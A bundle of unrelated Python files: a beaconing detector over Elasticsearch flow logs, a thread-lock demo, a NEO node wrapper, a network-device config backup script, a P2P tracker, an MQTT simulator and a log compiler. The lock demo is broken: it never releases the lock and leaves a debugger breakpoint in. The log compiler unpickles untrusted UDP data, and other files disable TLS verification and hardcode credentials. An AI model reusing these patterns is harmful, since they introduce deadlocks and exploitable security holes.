self.period = int(self.config.get('beacon','period'))
self.min_interval = int(self.config.get('beacon', 'min_interval'))
self.es_timeout = int(self.config.get('beacon','es_timeout'))
self.kibana_version = self.config.get('beacon','kibana_version')
self.beacon_src_ip = self.config.get('beacon','field_source_ip')
self.beacon_dest_ip = self.config.get('beacon', 'field_destination_ip')
self.beacon_destination_port = self.config.get('beacon', 'field_destination_port')
self.beacon_timestamp = self.config.get('beacon', 'field_timestamp')
self.beacon_flow_bytes_toserver = self.config.get('beacon', 'field_flow_bytes_toserver')
self.beacon_flow_id = self.config.get('beacon', 'field_flow_id')
self.beacon_event_type = self.config.get('beacon','event_type')
self.filter = self.config.get('beacon','filter')
self.verbose = self.config.config.getboolean('beacon', 'verbose')
self.auth_user = self.config.config.get('beacon','username')
self.auth_password = self.config.config.get('beacon', 'password')
self.suricata_defaults = self.config.config.getboolean('beacon','suricata_defaults')
try:
self.debug = self.config.config.getboolean('beacon', 'debug')
except:
pass
except Exception as e:
print(('{red}[FAIL]{endc} Could not properly load your config!\nReason: {e}'.format(red=bcolors.FAIL, endc=bcolors.ENDC, e=e)))
sys.exit(0)
else:
self.es_host = es_host
self.es_port = es_port
self.es_index = es_index
self.use_ssl = False
self.MIN_OCCURRENCES = min_occur
self.MIN_PERCENT = min_percent
self.WINDOW = window
self.NUM_PROCESSES = threads
self.period = period
self.min_interval = min_interval
self.kibana_version = kibana_version
self.es_timeout = es_timeout
self.beacon_src_ip = 'src_ip'
self.beacon_dest_ip = 'dest_ip'
self.beacon_destination_port = 'dest_port'
self.beacon_timestamp = '@timestamp'
self.beacon_flow_bytes_toserver = 'bytes_toserver'
self.beacon_flow_id = 'flow_id'
self.beacon_event_type = 'flow'
self.filter = ''
self.verbose = verbose
self.suricata_defaults = False
self.ver = {'4': {'filtered': 'query'}, '5': {'bool': 'must'}}
self.filt = list(self.ver[self.kibana_version].keys())[0]
self.query = list(self.ver[self.kibana_version].values())[0]
self.debug = debug
self.whois = WhoisLookup()
self.info = '{info}[INFO]{endc}'.format(info=bcolors.OKBLUE, endc=bcolors.ENDC)
self.success = '{green}[SUCCESS]{endc}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC)
self.fields = [self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port, self.beacon_flow_bytes_toserver, 'dest_degree', 'occurrences', 'percent', 'interval']
try:
_ = (self.auth_user, self.auth_password)
self.auth = "Enabled"
except AttributeError as e:
self.auth = "None"
try:
self.vprint('{info}[INFO]{endc} Attempting to connect to elasticsearch...'.format(info=bcolors.OKBLUE, endc=bcolors.ENDC))
if self.auth == "None":
self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, verify_certs=False, use_ssl=self.use_ssl, connection_class=RequestsHttpConnection)
else:
self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, http_auth=(self.auth_user, self.auth_password), verify_certs=False, use_ssl=self.use_ssl, connection_class=RequestsHttpConnection)
self.vprint('{green}[SUCCESS]{endc} Connected to elasticsearch on {host}:{port}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC, host=self.es_host, port=str(self.es_port)))
except Exception as e:
self.vprint(e)
raise Exception(
"Could not connect to ElasticSearch -- Please verify your settings are correct and try again.")
self.q_job = JoinableQueue()
self.l_df = Lock()
self.l_list = Lock()
self.high_freq = None
self.flow_data = self.run_query()
def vprint(self, msg):
if self.verbose:
print(msg)
def dprint(self, msg):
if self.debug:
print(("[DEBUG] " + str(msg)))
def hour_query(self, h, *fields):
"""
:param h: Number of hours to look for beaconing (recommend 24 if computer can support it)
:param fields: Retrieve only these fields -- example "src_ip", "dest_ip", "src_port", "dest_port"
:return:
"""
# Timestamp in ES is in milliseconds
NOW = int(time.time() * 1000)
SECONDS = 1000
MINUTES = 60 * SECONDS
HOURS = 60 * MINUTES
lte = NOW
gte = int(NOW - h * HOURS)
if self.es_index:
if self.filter:
self.query_string = "_exists_:" + self.beacon_src_ip + " AND _exists_:" + self.beacon_destination_port + " AND _exists_:" + self.beacon_dest_ip + " AND " + self.filter
else:
self.query_string = "_exists_:" + self.beacon_src_ip + " AND _exists_:" + self.beacon_destination_port + " AND _exists_:" + self.beacon_dest_ip
query = {
"query": {
self.filt: {
self.query: {
"query_string": {
"query": self.query_string,
"analyze_wildcard": 'true'
}
},
"filter": [{
"bool": {
"must": [
{
"range": {
self.beacon_timestamp: {
"gte": gte,
"lte": lte,
"format": "epoch_millis"
}
}
}
],
"must_not": []
}
},
{"term": {"event_type": self.beacon_event_type}}
]
}
}
}
else:
if self.filter:
self.query_string = "_exists_:src_ip AND _exists_:dest_ip AND _exists_:dest_port" + self.filter
else:
self.query_string = "_exists_:src_ip AND _exists_:dest_ip AND _exists_:dest_port"
query = {
"query": {
self.filt: {
self.query: {
"query_string": {
"query": self.query_string,
"analyze_wildcard": 'true'
}
},
"filter": {
"bool": {
"must": [
{
"range": {
"timestamp": {
"gte": gte,
"lte": lte,
"format": "epoch_millis"
}
}
}
],
"must_not": []
}
}
}
}
}
if fields:
query["_source"] = list(fields)
self.dprint(query)
return query
def percent_grouping(self, d, total):
mx = 0
interval = 0
# Finding the key with the largest value (interval with most events)
mx_key = int(max(iter(list(d.keys())), key=(lambda key: d[key])))
mx_percent = 0.0
for i in range(mx_key - self.WINDOW, mx_key + 1):
current = 0
# Finding center of current window
curr_interval = i + int(self.WINDOW / 2)
for j in range(i, i + self.WINDOW):
if j in d:
current += d[j]
percent = float(current) / total * 100
if percent > mx_percent:
mx_percent = percent
interval = curr_interval
return interval, mx_percent
def run_query(self):
self.vprint("{info} Gathering flow data... this may take a while...".format(info=self.info))
FLOW_BYTES = self.beacon_flow_bytes_toserver
if self.suricata_defaults:
FLOW_BYTES = 'flow.' + FLOW_BYTES
query = self.hour_query(self.period, self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port,
self.beacon_timestamp, FLOW_BYTES, self.beacon_flow_id)
self.dprint(query)
resp = helpers.scan(query=query, client=self.es, scroll="90m", index=self.es_index, timeout="10m")
df = pd.DataFrame([rec['_source'] for rec in resp])
if len(df) == 0:
raise Exception("Elasticsearch did not retrieve any data. Please ensure your settings are correct inside the config file.")
self.dprint(df)
df['dest_port'] = df[self.beacon_destination_port].fillna(0).astype(int)
if 'flow' in df.columns:
df[self.beacon_flow_bytes_toserver] = df['flow'].apply(lambda x: x.get(self.beacon_flow_bytes_toserver))
df['triad_id'] = (df[self.beacon_src_ip] + df[self.beacon_dest_ip] + df[self.beacon_destination_port].astype(str)).apply(hash)
df['triad_freq'] = df.groupby('triad_id')['triad_id'].transform('count').fillna(0).astype(int)
self.high_freq = list(df[df.triad_freq > self.MIN_OCCURRENCES].groupby('triad_id').groups.keys())
return df
def find_beacon(self, q_job, beacon_list):
while not q_job.empty():
triad_id = q_job.get()
self.l_df.acquire()
work = self.flow_data[self.flow_data.triad_id == triad_id]
self.l_df.release()
work[self.beacon_timestamp] = pd.to_datetime(work[self.beacon_timestamp])
work[self.beacon_timestamp] = (work[self.beacon_timestamp].astype(int) / 1000000000).astype(int)
work = work.sort_values([self.beacon_timestamp])
work['delta'] = (work[self.beacon_timestamp] - work[self.beacon_timestamp].shift()).fillna(0)
work = work[1:]
d = dict(work.delta.value_counts())
for key in list(d.keys()):
if key < self.min_interval:
del d[key]
# Finding the total number of events
total = sum(d.values())
if d and total > self.MIN_OCCURRENCES:
window, percent = self.percent_grouping(d, total)
if percent > self.MIN_PERCENT and total > self.MIN_OCCURRENCES:
PERCENT = str(int(percent))
WINDOW = str(window)
SRC_IP = work[self.beacon_src_ip].unique()[0]
DEST_IP = work[self.beacon_dest_ip].unique()[0]
DEST_PORT = str(int(work[self.beacon_destination_port].unique()[0]))
BYTES_TOSERVER = work[self.beacon_flow_bytes_toserver].sum()
SRC_DEGREE = len(work[self.beacon_dest_ip].unique())
OCCURRENCES = total
self.l_list.acquire()
beacon_list.append([SRC_IP, DEST_IP, DEST_PORT, BYTES_TOSERVER, SRC_DEGREE, OCCURRENCES, PERCENT, WINDOW])
self.l_list.release()
q_job.task_done()
def find_beacons(self, group=True, focus_outbound=False, whois=True, csv_out=None, html_out=None, json_out=None):
for triad_id in self.high_freq:
self.q_job.put(triad_id)
mgr = Manager()
beacon_list = mgr.list()
processes = [Process(target=self.find_beacon, args=(self.q_job, beacon_list,)) for thread in
range(self.NUM_PROCESSES)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
beacon_list = list(beacon_list)
beacon_df = pd.DataFrame(beacon_list,
columns=self.fields).dropna()
beacon_df.interval = beacon_df.interval.astype(int)
beacon_df['dest_degree'] = beacon_df.groupby(self.beacon_dest_ip)[self.beacon_dest_ip].transform('count').fillna(0).astype(int)
self.vprint('{info} Calculating destination degree.'.format(info=self.info))
if whois:
self.vprint('{info} Enriching IP addresses with whois information'.format(info=self.info))
beacon_df['src_whois'] = beacon_df[self.beacon_src_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
beacon_df['dest_whois'] = beacon_df[self.beacon_dest_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
if focus_outbound:
self.vprint('{info} Applying outbound focus - filtering multicast, reserved, and private IP space'.format(info=self.info))
beacon_df = beacon_df[(beacon_df[self.beacon_src_ip].apply(private_check)) &
(~beacon_df[self.beacon_dest_ip].apply(multicast_check)) &
(~beacon_df[self.beacon_dest_ip].apply(reserved_check)) &
(~beacon_df[self.beacon_dest_ip].apply(private_check))]
if group:
self.vprint('{info} Grouping by destination group IP'.format(info=self.info))
if whois:
self.fields.insert(self.fields.index(self.beacon_dest_ip), 'dest_whois')
beacon_df = pd.DataFrame(beacon_df.groupby(self.fields).size())
beacon_df.drop(0, axis=1, inplace=True)
if csv_out:
self.vprint('{success} Writing csv to {csv_name}'.format(csv_name=csv_out, success=self.success))
beacon_df.to_csv(csv_out, index=False)
if html_out:
self.vprint('{success} Writing html file to {html_out}'.format(html_out=html_out, success=self.success))
beacon_df.to_html(html_out)
if json_out:
self.vprint('{success} Writing json file to {json_out}'.format(json_out=json_out, success=self.success))
now = datetime.datetime.now().isoformat()
beacon_df['timestamp'] = now
beacon_df['period'] = self.period
beacon_df['event_type'] = "beaconing"
beacons = beacon_df.to_dict(orient="records")
with open(json_out, 'a') as out_file:
for beacon in beacons:
out_file.write(json.dumps(beacon) + '\n')
return beacon_df
|
python_thread_lock.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'线程锁'
__author__ = 'garyhu'
import threading,time,pdb;
balance = 0;
lock = threading.Lock();
def change_b(n):
global balance;
pdb.set_trace();# 调试断点
balance = balance - n;
balance = balance + n;
def run_task(n):
for i in range(100):
# 加上线程锁
lock.acquire();
try:
change_b(n);
except BaseException as e:
print("error");
finally:
# 完成后释放锁
# print("释放锁")
lock.release;()
if __name__ == '__main__':
thread1 = threading.Thread(target=run_task,args=(10,));
thread2 = threading.Thread(target=run_task,args=(21,));
print("开启子线程工作");
# 开启线程
thread1.start();
thread2.start();
# 等待线程结束
thread1.join();
thread2.join();
print("balance %d " % balance); |
serving_file_test.py | import requests
import random
from multiprocessing import Process
def test():
if random.randint(0, 1) == 0:
resp = requests.get("http://localhost:8080/statics/js/bootstrap.bundle.min.js")
else:
resp = requests.get("http://localhost:8080/statics/css/bootstrap.min.css")
if resp.status_code != 200:
print(resp)
if __name__ == '__main__':
print('starting test')
processes = [Process(target=test) for _ in range(200)]
for p in processes:
p.start()
for p in processes:
p.join()
print('end of test')
|
main.py | import os
import threading
from time import sleep
from enum import Enum
from twisted.internet import reactor, task
from shutil import copyfile
from neo.Core.Blockchain import Blockchain
from neo.Network.NodeLeader import NodeLeader
from neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain
from neo.Settings import settings
from neo.Implementations.Wallets.peewee.UserWallet import UserWallet
from prompt_toolkit import prompt
from neo.Wallets.utils import to_aes_key
from logzero import setup_logger
from base58 import b58encode_check
from neocore.Fixed8 import Fixed8
from neo.Prompt.Commands.Invoke import InvokeContract, TestInvokeContract
class NetworkType(Enum):
PRIVNET = 1
TESTNET = 2
MAINNET = 3
class BlockchainMain:
logger = None
network_type = None
blockchain = None
wallet_path = None
wallet = None
wallet_passwd_key = None
def __init__(self, network_type, logger_name):
self.network_type = network_type
# If you want the log messages to also be saved in a logfile, enable the
# next line. This configures a logfile with max 10 MB and 3 rotations:
# settings.set_logfile("/tmp/logfile.log", max_bytes=1e7, backup_count=3)
self.logger = setup_logger(logger_name)
def run(self):
settings.set_max_peers(150)
# Setup the blockchain
self.blockchain = LevelDBBlockchain(settings.chain_leveldb_path)
Blockchain.RegisterBlockchain(self.blockchain)
NodeLeader.Instance().Start()
dbloop = task.LoopingCall(Blockchain.Default().PersistBlocks)
dbloop.start(.1)
Blockchain.Default().PersistBlocks()
# Disable smart contract events for external smart contracts
settings.set_log_smart_contract_events(False)
# if the wallet was set up (by setting a path and loading the password), then open it!
if self.wallet_path:
self.wallet_open()
# Start a thread with custom code
d = threading.Thread(target=self.custom_background_code)
d.setDaemon(True) # daemonizing the thread will kill it when the main thread is quit
d.start()
# invoke any pre-start action that needs to occur before we start the reactor.
# optional for subclasses to implement.
self.pre_start()
# Run all the things (blocking call)
self.logger.info("Everything setup and running. Waiting for events...")
reactor.run()
self.logger.info("Shutting down")
if self.wallet_path:
self.wallet_close()
Blockchain.Default().Dispose()
NodeLeader.Instance().Shutdown()
self.logger.info("Shut down.")
def pre_start(self):
pass
def custom_background_code(self):
""" Custom code run in a background thread. Prints the current block height.
This function is run in a daemonized thread, which means it can be instantly killed at any
moment, whenever the main thread quits. If you need more safety, don't use a daemonized
thread and handle exiting this thread in another way (eg. with signals and events).
"""
while True:
self.logger.info("Block %s / %s", str(Blockchain.Default().Height), str(Blockchain.Default().HeaderHeight))
sleep(60)
@staticmethod
def get_address(raw_address):
# bl: NEO uses the AddressVersion 23, so stick that on the front of the address before doing the b58check
raw_address = b'\x17' + raw_address
return b58encode_check(raw_address).decode('utf-8')
def setup_wallet(self, wallet_path):
if not os.path.exists(wallet_path):
raise ValueError("Wallet file not found")
self.wallet_path = wallet_path
wallet_passwd = prompt("[password]> ", is_password=True)
self.wallet_passwd_key = to_aes_key(wallet_passwd)
self.setup_network()
def setup_network(self):
if self.network_type == NetworkType.TESTNET:
settings.setup_testnet()
elif self.network_type == NetworkType.MAINNET:
settings.setup_mainnet()
elif self.network_type == NetworkType.PRIVNET:
settings.setup_privnet()
else:
raise ValueError('Unknown wallet %s' % self.wallet_path)
def wallet_open(self):
self.wallet = UserWallet.Open(self.wallet_path, self.wallet_passwd_key)
# bl: there is some side effect happening here that allows the wallet to be fully/properly initialized.
# without this, there are errors when sending NEP5 tokens (same goes in prompt.py).
# don't have time to investigate right now, so doing this as a hack to get things working properly
self.wallet.ToJson()
# _walletdb_loop = task.LoopingCall(wallet.ProcessBlocks)
# _walletdb_loop.start(1)
self.logger.info("Opened wallet at %s", self.wallet_path)
def wallet_sync(self):
self.wallet.ProcessBlocks(0)
def wallet_close(self):
# _walletdb_loop.stop()
self.wallet_sync()
self.wallet.Close()
def recover_wallet(self):
self.logger.warn("recovering wallet...")
syncd_file_path = self.wallet_path + ".syncd"
# check if the syncd wallet exists, and raise an exception if it does not!
if not os.path.exists(syncd_file_path):
raise EnvironmentError("Could not find file %s" % syncd_file_path)
self.wallet_close()
os.remove(self.wallet_path)
copyfile(syncd_file_path, self.wallet_path)
self.wallet_open()
self.wallet_sync()
self.logger.warn("wallet recovered!")
def wait_for_peers(self):
while len(NodeLeader.Instance().Peers) == 0:
self.logger.debug('waiting for NodeLeader peers')
sleep(1)
def test_invoke(self, args, expected_result_count, test_only=False, from_addr=None):
if args and len(args) > 0:
tx, fee, results, num_ops = TestInvokeContract(self.wallet, args, from_addr=from_addr)
if tx is not None and results is not None:
print(
"\n-------------------------------------------------------------------------------------------------------------------------------------")
print("Test invoke successful")
print("Total operations: %s" % num_ops)
print("Results %s" % [str(item) for item in results])
print("Invoke TX GAS cost: %s" % (tx.Gas.value / Fixed8.D))
print("Invoke TX fee: %s" % (fee.value / Fixed8.D))
print(
"-------------------------------------------------------------------------------------------------------------------------------------\n")
if results[0].GetBigInteger() != expected_result_count:
self.logger.error("Found invalid result! '%s' but expected '%s'" % (results[0], expected_result_count))
if test_only:
return True
# bl: tx can fail if there are no connected peers, so wait for one
self.wait_for_peers()
return InvokeContract(self.wallet, tx, fee, from_addr)
else:
print("Error testing contract invoke: %s" % args)
else:
print("Invalid args for test_invoke! %s" % args)
return False
def shutdown(self):
self.logger.info("Shutdown invoked")
reactor.stop()
|
DeviceCfgBackup_v5.0.py | #encoding=utf-8
import paramiko,openpyxl,time,re,os,sys,threading
from threading import *
from netmiko import ConnectHandler
def gain_cfgIp(): #设备IP获取
fd=openpyxl.load_workbook(sys.path[0]+r'/DeviceIP.xlsx')
ip_sheet=fd['ip']
i=2
list_ip=[]
name_sw=[]
while ip_sheet["B"+str(i)].value!=None:
#print(ip_sheet["B"+str(i)].value)
list_ip.append("".join(map(lambda x:str(x),re.findall("[0-9,/.]",ip_sheet["B"+str(i)].value))))#IP地址字符过滤,只筛选出数字和.
name_sw.append(ip_sheet["A"+str(i)].value)
i=i+1
return list_ip,name_sw #返回包含ip和name两个列表的元组,元组不能二次赋值
def save_cfg(ip_value): #当前配置保存
h3c = {
'device_type':'hp_comware', #修改对应的device_type对应的值已适配不同的网络厂商,华三:hp_comware,华为:huawei
'ip':ip_value,
'username':username,
'password':password,
}
huawei = {
'device_type':'huawei', #华三:hp_comware,华为:huawei
'ip':ip_value,
'username':username,
'password':password,
}
pool_sema.acquire()
print(ip_value+':配置保存中....')
try:
#connect=ConnectHandler(**huawei)
connect=ConnectHandler(**h3c) #不同厂商设备选用不同字典:华为使用huawei,华三使用h3c
output_1 = connect.send_command_timing('save\ny\n\ny\n') #沿通道发送命令,返回输出(基于时序)
print(ip_value+':配置保存完成')
connect.disconnect()
except Exception as e:
print(ip_value+':登陆失败!!!\n【error info】:',e)
pool_sema.release()
def cfg_download(ip_value,name,for_i,backup_path): #sftp文件下载
pool_sema.acquire()
try:
transport = paramiko.Transport((ip_value, 22))
transport.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(transport)
# sftp.put(r'C:\py\test.PAT', r'/ttest.log') # 将123.py 上传至服务器 /tmp下并改名为test.py
sftp.get(cfg_name,backup_path+'/'+name[for_i]+"_"+ip_value+'.cfg')
print('配置备份文件生成:'+name[for_i]+"_"+ip_value+'.cfg')
transport.close()
except Exception as e:
print(name[for_i]+"_"+ip_value+':配置文件备份失败!!!\n【error info】:',e)
pool_sema.release()
def main():
#设备信息拉取
ip_pool=gain_cfgIp()
print(type(ip_pool))
#设备当前运行配置保存
for i in ip_pool[0]:
t2=Thread(target=save_cfg,args=(i,))
t2.start() #启动线程
time.sleep(60)
#设备配置文件下载存储
for_i=0
for i in ip_pool[0]:
if for_i==0:
#以当前时间为文件名,创建文件夹
local_time=time.strftime('%Y.%m.%d_%H.%M',time.localtime(time.time())) #创建文件夹
try:
os.mkdir(sys.path[0]+'/'+local_time)
except Exception as e:
print(e)
backup_path=sys.path[0]+'/'+local_time
t1=Thread(target=cfg_download,args=((i,ip_pool[1],for_i,backup_path))) #实例化一个线程,第几次,ip,name
t1.start() #启动线程
for_i=for_i+1
#传参
#DeviceType='hp_comware' #设备厂商——华三设备——hp_comware、华为:huawei
#DeviceTables_path=sys.path[0]+r'/DeviceIP.xlsx'
max_connections = 100 # 定义最大线程数
cfg_name=r'/startup.cfg' #修改需要下载的配置文件名,不同厂商配置文件名不同,缺省——华为:vrpcfg.zip、华三:startup.cfg
username='user' #输入需要登陆设备的ssh账户
password='password' #输入需要登陆设备的ssh密码
#传参
pool_sema = threading.BoundedSemaphore(max_connections) # 最大线程限制
if __name__ == "__main__":
main()
|
tracker.py | #!/usr/bin/env python3
#CS456 Assignment #3 - Tracker
#Daiyang Wang
#20646168
#Parameters: None
from socket import *
from threading import Thread, Lock
import sys, string, random, signal, json, collections
from packet import packet
import time
TERMINATE = False
peer_dict = {}
file_dict = {}
mesgs = collections.OrderedDict()
# Function check_inputs(args):
# Parameters: 0
#Create_TCP:
#Returns a socket on the first random port available (> 1024)
def Create_Socket():
testSocket = socket(AF_INET, SOCK_STREAM)
# testSocket.bind((str(gethostbyname(host)), int(testSocket.getsockname()[1]))) #Choose a free port
testSocket.bind(('',0)) #CHoose a free port
return testSocket #Return the socket
#tcpNegotiation():
#Waits for an initiation from the client on <n_socket> via the sending of a predefined request code, <42>.
#Once initialized, a socket is chosen at random for the transaction to be completed. This socket is sent back to the client.
#Returns: r_socket
def tcpInitiation(n_socket):
global peer_dict, file_dict
# set max number to 30
n_socket.listen(30)
waiting = 1
count = 0
while waiting:
# peer socket and addr
connectionSocket, addr = n_socket.accept()
# add into multi thread
t = Thread(target=peerInit, args=(connectionSocket, addr, count, ))
t.start()
time.sleep(5)
count += 1
if not peer_dict and count != 0:
break
# init peer with assigning peer number and
def peerInit(connectionSocket, addr, peerNum):
global peer_dict, file_dict
# send back to assigned peer number
# send peer num to peer
peer_num_pk = packet.create_t_to_p(1, str(peerNum))
data = packet.get_tcp_data(peer_num_pk)
connectionSocket.send(data)
# receive filename from peer
filename_pk = packet.parse_p2p_data(connectionSocket.recv(1024))
filename_data = filename_pk.data.split()
filename = str(filename_data[0])
# file trunk number
file_trunk_num = str(filename_data[1])
# time.sleep(1)
# receive port number from peer
port_pk = packet.parse_p2p_data(connectionSocket.recv(1024))
port_num = int(port_pk.data)
# replace the port to sever peer port
ip_addrs = addr[0]
server_addr = (ip_addrs, port_num)
peer_dict[peerNum] = [connectionSocket, server_addr]
peerNums = file_dict.get(filename, [])
peerNums.append(peerNum)
file_dict[filename] = peerNums
print("PEER ", peerNum, "CONNECT: OFFERS 1")
print(peerNum, " ", filename, " ", file_trunk_num)
time.sleep(1)
# once new peer connect, update list
t = Thread(target=peersBrodcast, args=())
t.start()
# listen packet until peer exit
while True:
peer_pk = packet.parse_p2p_data(connectionSocket.recv(1024))
if peer_pk.type == 2:
if peer_pk.seq_num == 0: # peer want to exit
# print("here: removing peers") #TODO
peer_pk = peer_pk.data.split()
peer_num = int(peer_pk[0])
peer_file_name = peer_pk[1]
num_files = peer_pk[2]
print("PEER", peer_num, peer_file_name)
# remove peer from peer dict
peer_dict.pop(peer_num, None)
print("PEER ", peer_num, " DISCONNECT: RECEIVED ", num_files)
for file_name, v in file_dict.items():
print(peer_num, " ", file_name)
if len(peer_dict) == 0:
# allow peer to exit
connectionSocket.send(packet.get_tcp_data(packet.create_t_to_p(0, "")))
return
peerlist = list(peer_dict.keys())
file_dict[peer_file_name] = peerlist
# remove from file dict
for k, v in file_dict.items():
try:
v.remove(str(peer_num))
except:
pass
# allow peer to exit
connectionSocket.send(packet.get_tcp_data(packet.create_t_to_p(0, "")))
# update new list to all peers
t1 = Thread(target=peersBrodcast, args=())
t1.start()
# peersBrodcast()
return
# broadcast to peer
def peersBrodcast():
# convert dictionary to string ready to send to peers
peer_dict_str = DicToString(peer_dict)
file_dict_str = DicToString(file_dict)
for k,v in peer_dict.items():
# send peer dictionary: peer_num (ipaddr, portnum)
connectionSocket = v[0]
connectionSocket.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
peer_data = packet.get_tcp_data(packet.create_t_to_p(2, peer_dict_str))
connectionSocket.send(peer_data)
time.sleep(1)
# send file dictionary: file_name (peer1, peer2, etc.)
files_data = packet.get_tcp_data(packet.create_t_to_p(3, file_dict_str))
connectionSocket.send(files_data)
def DicToString(dic):
dic_str = ""
for keys, values in dic.items():
if (isinstance(keys, int)):
ip_addr, port_num = values[1]
dic_str += str(keys) + ": " + str(ip_addr) + " " + str(port_num) + " ;"
else:
dic_str += str(keys) + ": "
for i in values:
dic_str += str(i) + " "
dic_str += " ;"
return dic_str
#Main
def main():
tcp_socket = Create_Socket()
# get the tcp
trackerHost, neg_port = tcp_socket.getsockname() # print TCP server port
# put port number into port.txt files
port_to_write = open("port.txt", 'w')
port_to_write.write(str(neg_port))
port_to_write.close()
# print("SERVER_PORT =", str(neg_port))
tcpInitiation(tcp_socket) #Wait for initiation
main()
|
Temperature.py | import paho.mqtt.client as mqtt
import threading
import random
import time
from tkinter import *
import datetime
##### Flags #####
TEMP_RISE = True
BROKER = "192.168.12.1"
TOPIC = 'internetofthings/sim/'
SUBTOPIC = 'temperature'
def show_values():
input_temp = w2.get()
while TRUE:
while True:
if TEMP_RISE == TRUE:
input_temp = input_temp + random.uniform(0, 0.3)
if input_temp < 200:
break
print("Temp out of range, type again")
thread1 = threading.Thread(target=publish, args=(client, TOPIC + SUBTOPIC, round(input_temp, 1)))
thread1.start()
time.sleep(4)
def publish(client, topic, temperatur):
client.publish(topic, temperatur)
print("published data in " + TOPIC + SUBTOPIC + " " + str(temperatur) + "°")
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
def on_closing():
master.destroy()
client = mqtt.Client()
client.on_message = on_message
client.connect(BROKER, 1883, 60)
master = Tk()
w2 = Scale(master, from_=-50, to=150, length=600, orient=HORIZONTAL)
w2.pack()
Button(master, text='Publish temperature', command=show_values).pack()
mainloop()
|
LogCompiler.py | #!/usr/bin/python
# Copyright (c) 2017, Autonomous Networks Research Group. All rights reserved.
# Developed by:
# Autonomous Networks Research Group (ANRG)
# University of Southern California
# http://anrg.usc.edu/
# Contributors:
# Vidhi Goel
# Jake Goodman
# Jessica Koe
# Jun Shin
# Davina Zahabian
# Pradipta Ghosh
# Bhaskar Krishnamachari
# Contacts:
# Pradipta Ghosh <pradiptg@usc.edu>
# Bhaskar Krishnamachari <bkrishna@usc.edu>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# with the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimers.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimers in the
# documentation and/or other materials provided with the distribution.
# - Neither the names of Autonomous Networks Research Group, nor University of
# Southern California, nor the names of its contributors may be used to
# endorse or promote products derived from this Software without specific
# prior written permission.
# - A citation to the Autonomous Networks Research Group must be included in
# any publications benefiting from the use of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH
# THE SOFTWARE.
###### LogCompiler.py ######
# Author: Jake Goodman & Jess Koe #
######################
#socat STDIO UDP4-DATAGRAM:10.99.0.255:6666,bind=:6666,broadcast
#This sets you up to broadcast and receive messages on port 6666
import socket
from threading import Thread
from Location import Location
import time
import pickle
import CFGReader
import math
class LogCompiler(object):
def __init__(self, receivePort):
self.__receivePort = receivePort
self.receiveSocket = None
self.currTimeInterval = 0
self.nodes = {}
self.messageTracker = {}
#self.logFile = open('/home/dev/401/emane-tutorial/scenario/scenario.eel', 'w', 1)
self.logFile = open('../scenario/scenario.eel', 'w', 1)
self.initLogFileFromCfg()
def initLogFileFromCfg(self):
done = False
index = 1
while done == False:
section = "R" + str(index)
robotDict = CFGReader.ReadConfig("swarm.cfg", section)
if not robotDict:
done = True
break
rID = robotDict['rid']
loc = Location(float(robotDict["x"]), float(robotDict["y"]), float(robotDict["z"]))
self.nodes[rID] = self.xyzToLatLong(loc.getX(), loc.getY(), loc.getZ())
index += 1
srcDict = CFGReader.ReadConfig("swarm.cfg", "src")
dstDict = CFGReader.ReadConfig("swarm.cfg", "dst")
if not srcDict:
sys.exit("No [src] found in swarm.cfg")
if not dstDict:
sys.exit("No [dst] found in swarm.cfg")
srcLoc = Location(float(srcDict["x"]), float(srcDict["y"]), float(srcDict["z"]))
dstLoc = Location(float(dstDict["x"]), float(dstDict["y"]), float(dstDict["z"]))
self.nodes[index] = self.xyzToLatLong(srcLoc.getX(), srcLoc.getY(), srcLoc.getZ())
self.nodes[index + 1] = self.xyzToLatLong(dstLoc.getX(), dstLoc.getY(), dstLoc.getZ())
for i in range(11):
self.currTimeInterval = i
for rID in sorted(self.nodes.iterkeys()):
nodeLoc = self.nodes[rID]
latLongLoc = self.xyzToLatLong(nodeLoc.getX(), nodeLoc.getY(), nodeLoc.getZ())
logLine = str(i) + '.0 nem:' + str(rID) + ' location gps ' + str(latLongLoc.getX()) + ',' + str(latLongLoc.getY())+ ',' +str(latLongLoc.getZ()) + '\n'
self.logFile.write(logLine)
self.currTimeInterval += 1
def start(self):
self.setupConnection()
output = Thread(target = self.outputNodeData)
output.start()
def setupConnection(self):
self.receiveSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.receiveSocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.receiveSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.receiveSocket.bind(('', self.__receivePort))
connection = Thread(target = self.listen)
connection.start()
def listen(self):
messageCounter = 0;
#self.messageTracker['002'] =1;
while True:
socketData = self.receiveSocket.recv(10240)
data= pickle.loads(socketData)
data = data.strip()
nodeData = data.split(' ')
senderID = nodeData[0]
